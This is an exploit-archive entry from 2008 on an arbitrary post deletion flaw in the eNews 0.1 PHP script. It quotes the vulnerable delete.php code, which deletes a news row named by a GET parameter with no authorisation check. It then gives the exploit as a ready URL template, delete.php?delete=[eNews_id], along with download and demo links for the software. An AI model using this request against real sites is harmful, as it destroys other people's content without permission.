eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
# Published : 2008-06-21
# Author : ilker Kandemir
# Previous Title : @CMS 2.1.1 (readarticle.php article_id) SQL Injection Vulnerability
# Next Title : PHP KnowledgeBase Script 2.4 (cat_id) SQL Injection Vulnerability

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability


Author: iLker Kandemir [MEFISTO]

Script download : http://www.hotscripts.com/Detailed/81086.html

script demo : http://emvvy.com/demos/enews/

site : www.dumenci.net

----------------------------------------------------------------
//poc:

if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));

----------------------------------------------------------------

//exploit :

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------

tnx : aLL my FriEndZ 

# www.Syue.com [2008-06-21]